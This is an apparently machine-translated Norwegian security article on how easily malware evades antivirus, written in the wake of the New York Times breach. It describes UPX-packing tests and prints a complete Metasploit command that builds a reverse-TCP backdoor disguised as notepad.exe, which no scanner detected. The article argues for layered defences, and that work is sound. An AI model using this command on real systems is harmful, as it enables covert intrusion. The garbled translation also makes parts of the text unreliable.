Antivirus unnvikelsesmanøvrer vise letthet i å unngå antivirus detection

for kort oppsummering i slutten av januar New York Times
avslørt det hadde vært utsatt for Kina-baserte cyberattack kampanjen, som hadde gått på ubemerket i minst fire måneder. Angripere antas å ha fått første nettverkstilgang ved spearphishing, deretter ved hjelp av gyldige legitimasjon for å gjøre sin vei gjennom nettverket og inn i mer enn fire dusin ansattes datamaskiner, søker identiteten til journalistenes kilder på historier som involverer den kinesiske statsministeren.

de gnister begynte å fly når Times
rapporterte at angriperne hadde installert minst 45 stykker av tilpassede malware på nettverket sitt, bare én av dem ble oppdaget av Symantec Corp. antimalware produkter installert på sine systemer. I et uvanlig trekk, Symantec lansert et svar merke seg betydningen av flere lag med sikkerhet, som for eksempel omdømme-basert teknologi og atferdsbasert blokkering. Den siste linjen i Symantecs uttalelse var kicker: " Antivirusprogramvare alene er ikke nok "

Symantec fått det riktig.. Antivirus alene kan ikke beskytte et privat nettverk mot malware, uansett hvor sofistikert eller avansert de heuristikk. Ingen bedriften bør ikke stole kun på antivirus påvisning fordi nettkriminelle nå har for mange forskjellige metoder til rådighet for å endre kjør. Vi vil undersøke noen av de avanserte teknikker angripere bruker for å vise hvor vanskelig og forvirrende det kan være for bedriftene å identifisere avanserte malware angrep. Det er imidlertid viktig å merke seg at alle sikkerhets argumenter bør fortsette å forske på nye metoder som de dukker opp; teknikkene som brukes av malware forfattere er i stadig utvikling.
Obfuscation å unngå å bli oppdaget

En av de første teknikker som hackere bruker for å unngå antivirus deteksjon er kompresjon. Opprinnelig ment å hjelpe applikasjonsutviklere i å redusere størrelsen på sine programfiler for å lette distribusjon, er komprimering brukt av malware forfattere til obfuscate innholdet i kjørbare. Ved å bruke kompresjonsteknikker, malware forfattere fant de kunne endre koden sin for å omgå signaturbasert antivirus-programvare. Mange programmer kan brukes til komprimering, men en av de mest populære er kalt Ultimate Packer for kjørbare filer (UPX). Det er åpen kildekode og er tilgjengelig fra Sourceforge.

Jeg brukte denne teknikken mot kjente malware prøver å demonstrere effekten av tåkelegging gjennom komprimering. Jeg synes det er nyttig å holde en samling av eksempler på skadelig programvare som jeg har møtt gjennom årene for å teste nye forsvar og validere gjenkjenning strategier. Jeg valgte to av de mest beryktede stammer av malware i samlingen min. Den ene er en variant av Zeus Trojan som kom gjennom antivirus systemer ubemerket i mai 2012. Den andre er en variant av den utrolig vellykket ransomware, som ligner falske antivirus og har vært svøpe IT avdelinger rundt om i verden.

Begge disse eldre prøvene malware er lett synlig med up-to-date signaturer av alle antivirusprodukt på markedet i dag. Jeg kjørte dem gjennom gratis webtjeneste på virustotal.com, som analyserer mistenkelige filer og webadresser gjennom opp til 46 forskjellige antivirusmotorer. Resultatene av testene var at Zevs ble oppdaget av 43 ut av 46 av de antivirusmotorer mens Fake-AV ble oppdaget av 42 ut av 45.

Jeg kjørte begge filene gjennom en kjørbar pakning, og den nylig uklar filer gjennom virustotal.com service, og sammenlignet resultatene.

pakket Zeus Trojan var i stand til å unngå ytterligere 12 antivirus gjenkjenning motorer, som var forventet. Den uventede funn er at det ble identifisert ulikt av flere store antivirusmotorer. Microsofts motor savnet pakkede filen helt, mens Symantec motoren reklassifisert filen som "Suspicious.SecTool."

Symantec var ikke alene om å omklassifisere den type malware oppdages. Følgende lister viser at, med unntak av McAfee, de fleste av de kjente antivirusmotorer også reklassifisert malware. McAfee var i stand til å oppdage malware tross for modifikasjoner, som så lovende. Den neste testen var å verifisere om McAfee ville gjøre så godt med en annen malware prøven.

Testresultater fra pakking av falsk antivirus ransomware var enda bedre enn oppnådde resultater med pakket Zeus Trojan. Tre flere antivirusmotorer savnet deteksjon helt, heve det totale antallet målet denne gangen til 15. Symantec viste seg å være en av motorene som ikke klarte å oppdage eventuelle malware fra pakket ransomware kjørbar, men det var sikkert ikke alene som tabellene nedenfor illustrere.

McAfee og Microsoft begge gjøre det bra i denne testen. Men dette er ikke å antyde at noen av disse antivirus motorene tilby "bedre" beskyttelse enn noen andre. Testen bare besto av to forskjellige filer som hadde blitt pakket ved hjelp av en kompresjonsverktøy. Resultatene kan være helt annerledes ved hjelp av ulike eksempler på skadelig programvare eller komprimering verktøy. Denne testen viser bare at det er mulig å omgå antivirusmotorer som bruker denne metoden. Det er fortsatt nok av andre metoder som kan brukes til å omgå dem.
Emballasje utnytter med Penetration-Testing Rammeverk

Min neste test utnyttet den populære Metasploit Community Edition penetration- testing rammeverk. Dette verktøyet er godt kjent for sin åpne bidrag utvikling og fleksibilitet. Evnen til å pakke exploits eller bakdører inn filer som kan brukes i penetrasjonstest var en viktig funksjon som ble lagt for flere år siden. Mange populære filformater kan lages av dette verktøyet, inkludert PDF-filer og alle de vanlige Microsoft Office-formater. Det kan også generere kjørbare, som kan malbasert fra standard Microsoft Windows programfiler. En intetanende brukeren er sannsynlig å kjøre "notepad.exe" og ikke innser det har blitt endret. Dette er hvordan en penetrasjon tester kan unngå antivirusmotorer, og simulerer hvordan malware forfattere generere realistisk utseende ondsinnet kode

Jeg kjørte flere standard Microsoft Windows kjør gjennom følgende kommando for å teste antivirus oppklaringsprosenten.

msfpayload vinduer /shell /reverse_tcp LHOST = 192.168.1.75 LPORT = 4444 R | msfencode -c 5 -e x86 /shikata_ga_nai -x notepad.exe > Notepad2.exe

Kommandoen generert en standard omvendt TCP bakdør, noe som ville koble til kommando og kontroll server på 192.168.1.75 på port 4444. Dette ble transportert til giveren, som kjørte gjennom fem pasninger bruker shikata ga nai encoder. Dette uttrykket betyr "det kan ikke bli hjulpet" på japansk, men også refererer til det polymorfe XOR additiv tilbakemeldinger encoder brukes av Metasploit å skape kjør. Det endelige produktet - Notepad2.exe - ble fremstilt ved hjelp av notepad.exe som en mal. Offeret vil utføre Notepad2.exe og skape en bakdør forbindelse til C &. C server på 192.167.1.75

Det var da på tide å laste opp og skanne Notepad2.exe å teste deteksjon av samme antivirusmotorer anvendt i de tidligere tester. Denne testen var en fullstendig miss for hver og en av 46 antivirus motorer tilgjengelig på virustotal.com. Ingen av dem-inkludert Microsoft, Symantec, McAfee-identifisert bakdør som er kodet i denne filen. Men dette var ingen overraskelse. Det var forventet resultat for å demonstrere begrensninger av signaturbaserte antivirusmotorer. De må ha sett malware før for å oppdage det i fremtiden.

For å være klar, disse testene ikke-vitenskapelig og innebærer ikke at antivirus er ubrukelig som et forsvar mot moderne malware angrep . Det betyr ikke at antivirus er bare en del av en samlet forsvars grundig strategi er nødvendig for å beskytte selskapets databehandling eiendeler, akkurat som Symantec skrev i sitt svar til Times
artikkelen.
Layer Technologies på toppen av antimalware

for å nå dette målet, er nå tiden for CISOs å ta affære og presse sine organisasjoner for å vurdere lagdeling flere teknologier på toppen av antimalware-systemer. For eksempel kan det kombineres med hvitelister for å tillate bare godkjente programmer å kjøre på klientmaskiner. Neste generasjons brannmurer, IPS /IDS og Web filtrering systemer kan alle brukes til å oppdage uvanlig nettverkstrafikk, som nesten alltid accompianies malware infeksjoner. Selvfølgelig kan ingen systemer være effektive uten menneskelig fortolkning og intervensjon, så det er viktig at en velt sikkerhet profesjonell gis ansvaret for å overvåke hvilken sikkerhetssystemer blir utnyttet.

Antivirus har fått mye kritikk i pressen nylig, spørre folk til å spørre på nytt, hvis antivirus er død. Antivirus er levende og godt, men det skal bare være en del av en samlet defensiv stratetgy. Brukervennligheten som selv de mest grunnleggende angrep kan være effektivt maskeres, som demonstrert ovenfor, er ytterligere bevis på at effektiv informasjonssikkerhet bør aldri være sentrert rundt ett produkt eller sikkerhet lag; men oppnås gjennom en helhetlig risikostyring program som er avhengig av flere lag og teknologier. Times
hendelsen, og mange andre liker det, bør tjene som en katalysator for mange organisasjoner å supplere antimalware med dagens nye rasen av hjelpe forsvar

Om forfatteren:.
Joseph Granneman har mer enn 20 års erfaring innen teknologi og informasjonssikkerhet, primært fokusert i helsevesenet IT.